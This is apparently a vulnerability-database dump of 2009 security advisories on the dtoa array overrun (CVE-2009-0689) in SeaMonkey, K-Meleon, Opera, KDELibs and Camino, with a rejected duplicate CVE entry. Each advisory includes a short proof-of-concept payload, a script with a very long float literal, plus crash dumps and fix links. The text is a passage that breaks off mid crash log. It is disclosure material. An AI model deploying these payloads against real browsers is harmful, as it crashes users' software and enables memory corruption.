"cpe:2.3:a:mozilla:firefox:3.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2020-10-03T11:54:13", "description": "** REJECT ** DO NOT USE THIS CANDIDATE NUMBER. ConsultIDs: CVE-2009-0689. Reason: This candidate is a duplicate of CVE-2009-0689. Certain codebase relationships were not originally clear. Notes: All CVE users should reference CVE-2009-0689 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage.", "edition": 2, "cvss3": {}, "published": "2009-10-29T14:30:00", "title": "CVE-2009-1563", "type": "cve", "cwe": [], "bulletinFamily": "NVD", "cvss2": {}, "cvelist": ["CVE-2009-1563"], "modified": "2009-12-19T06:54:00", "cpe": [], "id": "CVE-2009-1563", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-1563", "cvss": {"score": 0.0, "vector": "NONE"}, "cpe23": []}], "packetstorm": [{"lastseen": "2016-12-05T22:21:23", "description": "", "published": "2009-11-20T00:00:00", "type": "packetstorm", "title": "SeaMonkey 1.1.0 Remote Array Overrun", "bulletinFamily": "exploit", "cvelist": ["CVE-2009-1563", "CVE-2009-0689"], "modified": "2009-11-20T00:00:00", "id": "PACKETSTORM:82821", "href": "https://packetstormsecurity.com/files/82821/SeaMonkey-1.1.0-Remote-Array-Overrun.html", "sourceData": "`-----BEGIN PGP SIGNED MESSAGE----- \nHash: SHA1 \n \n[ SeaMonkey 1.1.8 Remote Array Overrun (Arbitrary code execution) ] \n \nAuthor: Maksymilian Arciemowicz and sp3x \nhttp://SecurityReason.com \nDate: \n- - Dis.: 07.05.2009 \n- - Pub.: 20.11.2009 \n \nCVE: CVE-2009-0689 \nRisk: High \nRemote: Yes \n \nAffected Software: \n- - SeaMonkey 1.1.18 \n \nFixed in: \n- - SeaMonkey 2.0 \n \nNOTE: Prior versions may also be affected. \n \nOriginal URL: \nhttp://securityreason.com/achievement_securityalert/71 \n \n \n- --- 0.Description --- \nThe SeaMonkey project is a community effort to develop the SeaMonkey \nall-in-one internet application suite (see below). 
Such a software suite \nwas previously made popular by Netscape and Mozilla, and the SeaMonkey \nproject continues to develop and deliver high-quality updates to this \nconcept. Containing an Internet browser, email & newsgroup client with \nan included web feed reader, HTML editor, IRC chat and web development \ntools, SeaMonkey is sure to appeal to advanced users, web developers and \ncorporate users. \n \n \n- --- 1. SeaMonkey 1.1.18 Remote Array Overrun (Arbitrary code \nexecution) --- \nThe main problem exist in dtoa implementation. SeaMonkey has the same \ndtoa as a KDE, Opera and all BSD systems. This issue has been fixed in \nFirefox 3.5.4 and fix \n \nhttp://bonsai.mozilla.org/cvsview2.cgi?diff_mode=context&whitespace_mode=show&file=jsdtoa.c&branch=&root=/cvsroot&subdir=mozilla/js/src&command=DIFF_FRAMESET&rev1=3.41&rev2=3.42 \n \nhas been used to patch SeaMonkey 2.0. \n \nThis flaw has been detected in may 2009 and signed SREASONRES:20090625. \n \nhttp://securityreason.com/achievement_securityalert/63 \n \nbut fix for SREASONRES:20090625, used by openbsd was not good. \nMore information about fix for openbsd and similars SREASONRES:20091030, \n \nhttp://securityreason.com/achievement_securityalert/69 \n \nWe can create any number of float, which will overwrite the memory. In \nKmax has defined 15. Functions in dtoa, don't checks Kmax limit, and it \nis possible to call 16<= elements of freelist array. \n \n \n- --- 2. Proof of Concept (PoC) --- \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"9\",299999); ?>; \n</script> \n- ----------------------- \n \nIf we use SeaMonkey to see this PoC, SeaMonkey will crash. For example \n \n- ----------------------- \n<script> \nvar a=0.<?php echo str_repeat(\"1\",296450); ?>; \n</script> \n- ----------------------- \n \n127# gdb seamonkey-bin seamonkey-bin.core \n... \n#0 0x28df0ecb in ?? () \n... 
\n(gdb) i r \neax 0x0 0 \necx 0x2 2 \nedx 0xbfbfd2fc -1077947652 \nebx 0x28da9b6c 685415276 \nesp 0xbfbfd2ac 0xbfbfd2ac \nebp 0xbfbfd2c8 0xbfbfd2c8 \nesi 0xb 11 \nedi 0xb 11 \neip 0x28df0ecb 0x28df0ecb \n... \n \nesi = esi = 11 \n \n \n- --- 3. SecurityReason Note --- \n \nOfficialy SREASONRES:20090625 has been detected in: \n- - OpenBSD \n- - NetBSD \n- - FreeBSD \n- - MacOSX \n- - Google Chrome \n- - Mozilla Firefox \n- - Mozilla Seamonkey \n- - KDE (example: konqueror) \n- - Opera \n- - K-Meleon \n \nThis list is not yet closed. US-CERT declared that will inform all \nvendors about this issue, however, they did not do it. Even greater \nconfusion caused new CVE number \"CVE-2009-1563\". Secunia has informed \nthat this vulnerability was only detected in Mozilla Firefox, but nobody \nwas aware that the problem affects other products like ( KDE, Chrome ) \nand it is based on \"CVE-2009-0689\". After some time Mozilla Foundation \nSecurity Advisory \n(\"http://www.mozilla.org/security/announce/2009/mfsa2009-59.html\") \nwas updated with note : \n\"The underlying flaw in the dtoa routines used by Mozilla appears to be \nessentially the same as that reported against the libc gdtoa routine by \nMaksymilian Arciemowicz ( CVE-2009-0689)\". \nThis fact ( new CVE number for Firefox Vulnerability )and PoC in \njavascript (from Secunia), forced us to official notification all other \nvendors. We publish all the individual advisories, to formally show all \nvulnerable software and to avoid wrong CVE number. We do not see any \nother way to fix this issue in all products. \n \nPlease note: \nPatch used in Firefox 3.5.4 does not fully solve the problem. Dtoa \nalgorithm is not optimal and allows remote Denial of Service in Firefox \n3.5.5 giving long float number. \n \n \n- --- 4. 
Fix --- \nNetBSD fix (optimal): \nhttp://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h \n \nOpenBSD fix: \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c \nhttp://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c 
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c


--- 5. Credits ---
Discovered by Maksymilian Arciemowicz and sp3x from SecurityReason.com.


--- 6. Greets ---
Infospec p_e_a pi3


--- 7. Contact ---
Email:
- cxib {a.t] securityreason [d0t} com
- sp3x {a.t] securityreason [d0t} com

GPG:
- http://securityreason.com/key/Arciemowicz.Maksymilian.gpg
- http://securityreason.com/key/sp3x.gpg

http://securityreason.com/
http://securityreason.pl/

CVSS: 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Source: https://packetstormsecurity.com/files/download/82821/seamonkey-overrun.txt


[ PACKETSTORM:82822 - K-Meleon 1.5.3 Remote Array Overrun ]
Type: packetstorm (exploit)
Published: 2009-11-20 (last seen 2016-12-05)
CVE: CVE-2009-1563, CVE-2009-0689
https://packetstormsecurity.com/files/82822/K-Meleon-1.5.3-Remote-Array-Overrun.html

[ K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- K-Meleon 1.5.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/72


--- 0. Description ---
K-Meleon is an extremely fast, customizable, lightweight web browser based on the Gecko layout engine developed by Mozilla, which is also used by Firefox. K-Meleon is free, open source software released under the GNU General Public License and is designed specifically for Microsoft Windows (Win32) operating systems.


--- 1. K-Meleon 1.5.3 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. K-Meleon uses the same dtoa as KDE, Opera and all BSD systems. This issue was fixed in Firefox 3.5.4; see

http://securityreason.com/achievement_securityalert/63

However, the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of arbitrary length, which overwrites memory. Kmax is defined as 15, but the functions in dtoa do not check the Kmax limit, so freelist array elements at index 16 and above can be reached.


--- 2. Proof of Concept (PoC) ---

-----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
-----------------------

K-Meleon will crash with

Unhandled exception at 0x01800754 in k-meleon.exe: 0xC0000005: Access violation reading location 0x0bc576ec.

01800754 mov eax,dword ptr [ecx]

EAX 00000002
ECX 0BC576EC
EDI 028FEB51


--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been confirmed in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed. US-CERT declared that it would inform all vendors about this issue; however, it did not do so. The new CVE number "CVE-2009-1563" caused even greater confusion. Secunia reported that this vulnerability had been detected only in Mozilla Firefox, but nobody was aware that the problem affects other products (such as KDE and Chrome) and that it is based on "CVE-2009-0689".
After some time the Mozilla Foundation Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We are publishing all the individual advisories to formally show all vulnerable software and to avoid a wrong CVE number. We do not see any other way to fix this issue in all products.

Please note:
The patch used in Firefox 3.5.4 does not fully solve the problem. The dtoa algorithm is not optimal and allows a remote Denial of Service in Firefox 3.5.5 when given a long floating-point number.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/sum.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtord.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtod.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/smisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/misc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/hdtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gethex.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/gdtoa.h
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dtoa.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/dmisc.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdio/vfprintf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/arch/vax/gdtoa/strtof.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtorf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtordd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtopQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodnrp.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtodI.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIxL.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIx.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIg.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIf.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIdd.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoId.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/strtoIQ.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/qnan.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_xLfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ffmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_dfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_ddfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g__fmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/g_Qfmt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/gdtoa/arithchk.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/gcvt.c
http://www.openbsd.org/cgi-bin/cvsweb/src/lib/libc/stdlib/ecvt.c

CVSS: 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Source: https://packetstormsecurity.com/files/download/82822/kmeleon-overrun.txt


[ PACKETSTORM:82823 - Opera 10.01 Remote Array Overrun ]
Type: packetstorm (exploit)
Published: 2009-11-20 (last seen 2016-12-05)
CVE: CVE-2009-1563, CVE-2009-0689
https://packetstormsecurity.com/files/82823/Opera-10.01-Remote-Array-Overrun.html

[ Opera 10.01 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- Opera 10.01
- Opera 10.10 Beta

NOTE: Prior versions may also be affected.
Original URL:
http://securityreason.com/achievement_securityalert/73


--- 0. Description ---
Opera is a Web browser and Internet suite developed by the Opera Software company. The browser handles common Internet-related tasks such as displaying Web sites, sending and receiving e-mail messages, managing contacts, IRC online chatting, downloading files via BitTorrent, and reading Web feeds. Opera is offered free of charge for personal computers and mobile phones.


--- 1. Opera 10.01 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Opera's dtoa algorithm is very similar to the one in the BSD, Chrome and Mozilla products. It is the same issue as SREASONRES:20090625:

http://securityreason.com/achievement_securityalert/63

However, the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of arbitrary length, which overwrites memory. Kmax is defined as 15, but the functions in dtoa do not check the Kmax limit, so freelist array elements at index 16 and above can be reached.


--- 2. Proof of Concept (PoC) ---

-----------------------
<script>
var a=0.<?php echo str_repeat("9",299999); ?>;
</script>
-----------------------

Opening this PoC in Opera crashes the browser. For example, with

-----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
-----------------------

OPERA-CRASHLOG V1 desktop 10.01 1844 windows
Opera.exe 1844 caused exception C0000005 at address 67956906 (Base: 400000)

Registers:
EAX=01165C40 EBX=0592064C ECX=A0D589D4 EDX=42000000 ESI=C20471EC
EDI=00000000 EBP=0012E384 ESP=0012E2FC EIP=67956906 FLAGS=00010202
CS=001B DS=0023 SS=0023 ES=0023 FS=003B GS=0000
FPU stack:
C020A38F66534266F000 C020A38F66534266F000 3FFBE38E38E38E38D800
3FC78000000000000000 10000000000100000000 0BBE0000000000040000
00000000000000000000 2EBA804E2FDE00000000 SW=0122 CW=027F

127# gdb -q opera opera.core
...
Program terminated with signal 11, Segmentation fault.
#0 0x2960307b in ?? ()
...
(gdb) i r
eax 0x71c71c71 1908874353
ecx 0x2aa03be4 715144164
edx 0x0 0
ebx 0x296177f8 694253560
esp 0xbfbfb650 0xbfbfb650
ebp 0xbfbfb698 0xbfbfb698
esi 0x2962d000 694341632
edi 0x0 0
eip 0x2960307b 0x2960307b
...
(gdb) x/100x ($esi)-90
0x2962cfa6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0x2962cfb6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0x2962cfc6: 0xc71c71c7 0x71c71c71 0x1c71c71c 0xc71c71c7
0x2962cfd6: 0x71c71c71 0x1c71c71c 0xc71c71c7 0x71c71c71
0x2962cfe6: 0x1c71c71c 0xc71c71c7 0x71c71c71 0x1c71c71c
0x2962cff6: 0xc71c71c7 0x71c71c71 Cannot access memory at address 0x2962cffe
...


--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been confirmed in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed. US-CERT declared that it would inform all vendors about this issue; however, it did not do so. The new CVE number "CVE-2009-1563" caused even greater confusion. Secunia reported that this vulnerability had been detected only in Mozilla Firefox, but nobody was aware that the problem affects other products (such as KDE and Chrome) and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We are publishing all the individual advisories to formally show all vulnerable software and to avoid a wrong CVE number. We do not see any other way to fix this issue in all products.


--- 4. Fix ---
Opera fix:
The vulnerability was fixed in the latest release candidate, Opera RC3:
http://snapshot.opera.com/windows/Opera_1010_1890_in.exe
The final version of Opera with the fix can be expected shortly.
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
The same set of OpenBSD gdtoa and stdlib files as listed in the Fix section of the K-Meleon advisory above.

CVSS: 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Source: https://packetstormsecurity.com/files/download/82823/opera-overrun.txt


[ PACKETSTORM:82824 - KDELibs 4.3.3 Remote Array Overrun ]
Type: packetstorm (exploit)
Published: 2009-11-20 (last seen 2016-12-05)
CVE: CVE-2009-1563, CVE-2009-0689
https://packetstormsecurity.com/files/82824/KDELibs-4.3.3-Remote-Array-Overrun.html

[ KDE KDELibs 4.3.3 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 20.11.2009

CVE: CVE-2009-0689
Risk: High
Remote: Yes

Affected Software:
- KDELibs 4.3.3

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/74


--- 0. Description ---
KDELibs is a collection of libraries built on top of Qt that provides frameworks and functionality for developers of KDE-compatible software. The KDELibs libraries are licensed under the LGPL.


--- 1. KDE KDELibs 4.3.2 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. KDE's dtoa algorithm is very similar to the one in the BSD, Chrome and Mozilla products.
The problem is in the dtoa.cpp file

http://websvn.kde.org/tags/KDE/4.3.3/kdelibs/kjs/dtoa.cpp?revision=1042584&view=markup

and it is the same issue as SREASONRES:20090625:

http://securityreason.com/achievement_securityalert/63

However, the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of arbitrary length, which overwrites memory. Kmax is defined as 15, but the functions in dtoa do not check the Kmax limit, so freelist array elements at index 16 and above can be reached.


--- 2. Proof of Concept (PoC) ---

-----------------------
<script>
var a=0.<?php echo str_repeat("9",299999); ?>;
</script>
-----------------------

Opening this PoC in Konqueror crashes it. For example, with

-----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
-----------------------

Program received signal SIGSEGV, Segmentation fault.
[Switching to process 24845, thread 0x7e6e6800]
0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0

0x06db85c3 <diff+163>: mov %esi,(%ecx)

#0 0x090985c3 in diff () from /usr/local/lib/libkjs.so.5.0
#1 0x0909901b in kjs_strtod () from /usr/local/lib/libkjs.so.5.0
#2 0x090738e5 in KJS::Lexer::lex () from /usr/local/lib/libkjs.so.5.0
#3 0x0907300c in kjsyylex () from /usr/local/lib/libkjs.so.5.0
#4 0x09072f86 in kjsyyparse () from /usr/local/lib/libkjs.so.5.0
#5 0x090805cf in KJS::Parser::parse () from /usr/local/lib/libkjs.so.5.0
#6 0x0908337f in KJS::InterpreterImp::evaluate ()

(gdb) i r
eax 0x0 0
ecx 0x220ff000 571469824
edx 0x0 0
ebx 0x220fbb00 571456256
esp 0xcfbc04e0 0xcfbc04e0
ebp 0xcfbc0518 0xcfbc0518
esi 0xc71c71c7 -954437177
edi 0x0 0
eip 0x21415c3 0x21415c3

esi=0x71c71c7


--- 3. SecurityReason Note ---

Officially, SREASONRES:20090625 has been confirmed in:
- OpenBSD
- NetBSD
- FreeBSD
- MacOSX
- Google Chrome
- Mozilla Firefox
- Mozilla Seamonkey
- KDE (example: konqueror)
- Opera
- K-Meleon

This list is not yet closed. US-CERT declared that it would inform all vendors about this issue; however, it did not do so. The new CVE number "CVE-2009-1563" caused even greater confusion. Secunia reported that this vulnerability had been detected only in Mozilla Firefox, but nobody was aware that the problem affects other products (such as KDE and Chrome) and that it is based on "CVE-2009-0689". After some time the Mozilla Foundation Security Advisory
(http://www.mozilla.org/security/announce/2009/mfsa2009-59.html)
was updated with the note:
"The underlying flaw in the dtoa routines used by Mozilla appears to be essentially the same as that reported against the libc gdtoa routine by Maksymilian Arciemowicz (CVE-2009-0689)".
This fact (a new CVE number for the Firefox vulnerability) and the JavaScript PoC from Secunia forced us to officially notify all other vendors. We are publishing all the individual advisories to formally show all vulnerable software and to avoid a wrong CVE number. We do not see any other way to fix this issue in all products.


--- 4. Fix ---
NetBSD fix (optimal):
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/gdtoa/gdtoaimp.h

OpenBSD fix:
The same set of OpenBSD gdtoa and stdlib files as listed in the Fix section of the K-Meleon advisory above.

CVSS: 6.8 (AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/)
Source: https://packetstormsecurity.com/files/download/82824/kdelibs-overrun.txt


[ PACKETSTORM:83738 - Camino 1.6.10 Remote Array Overrun ]
Type: packetstorm (exploit)
Published: 2009-12-12 (last seen 2016-12-05)
CVE: CVE-2009-0689
https://packetstormsecurity.com/files/83738/Camino-1.6.10-Remote-Array-Overrun.html

[ Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ]

Author: Maksymilian Arciemowicz and sp3x
http://SecurityReason.com
Date:
- Dis.: 07.05.2009
- Pub.: 11.12.2009

CVE: CVE-2009-0689
CWE: CWE-119
Risk: High
Remote: Yes

Affected Software:
- Camino 1.6.10

Fixed in:
- Camino 2.0 and later

NOTE: Prior versions may also be affected.

Original URL:
http://securityreason.com/achievement_securityalert/76


--- 0. Description ---
Camino (from the Spanish word camino meaning "way", "path" or "road") is a free, open source, GUI-based Web browser based on Mozilla's Gecko layout engine and specifically designed for the Mac OS X operating system. In place of the XUL-based user interface used by most Mozilla-based applications, Camino uses Mac-native Cocoa APIs, although it does not use native text boxes.

--- 1. Camino 1.6.10 Remote Array Overrun (Arbitrary code execution) ---
The main problem exists in the dtoa implementation. Camino has the same dtoa as Firefox, SeaMonkey, Chrome, Opera, etc., and it is the same issue as SREASONRES:20090625:

http://securityreason.com/achievement_securityalert/63

However, the fix for SREASONRES:20090625 used by OpenBSD was not good. More information about the fix for OpenBSD and similar systems is in SREASONRES:20091030:

http://securityreason.com/achievement_securityalert/69

We can supply a floating-point literal of arbitrary length, which overwrites memory. Kmax is defined as 15, but the functions in dtoa do not check the Kmax limit, so freelist array elements at index 16 and above can be reached.


--- 2. Proof of Concept (PoC) ---
-----------------------
<script>
var a=0.<?php echo str_repeat("1",296450); ?>;
</script>
-----------------------

Process: Camino [153]
Path: /Volumes/Camino/Camino.app/Contents/MacOS/Camino
Identifier: org.mozilla.camino
Version: 1.6.10 (1609.09.25)
Code Type: X86 (Native)
Parent Process: launchd [92]

Date/Time: 2009-11-06 12:57:24.698 -0800
OS Version: Mac OS X 10.5.6 (9G55)
Report Version: 6

Exception Type: EXC_BAD_ACCESS (SIGSEGV)
Exception Codes: KERN_INVALID_ADDRESS at 0x000000007e33d590
Crashed Thread: 0

Thread 0 Crashed:
0 libSystem.B.dylib 0x01d7e325 tiny_malloc_from_free_list + 235
1 libSystem.B.dylib 0x01d7710d szone_malloc + 180
2 libSystem.B.dylib 0x01d77018 malloc_zone_malloc + 81
3 libSystem.B.dylib 0x01d76fac malloc + 55
4 libxpcom_core.dylib 0x00c5271d PL_DHashTableInit + 220
5 org.mozilla.camino 0x00389bac RuleHash::RuleHash(int) + 282
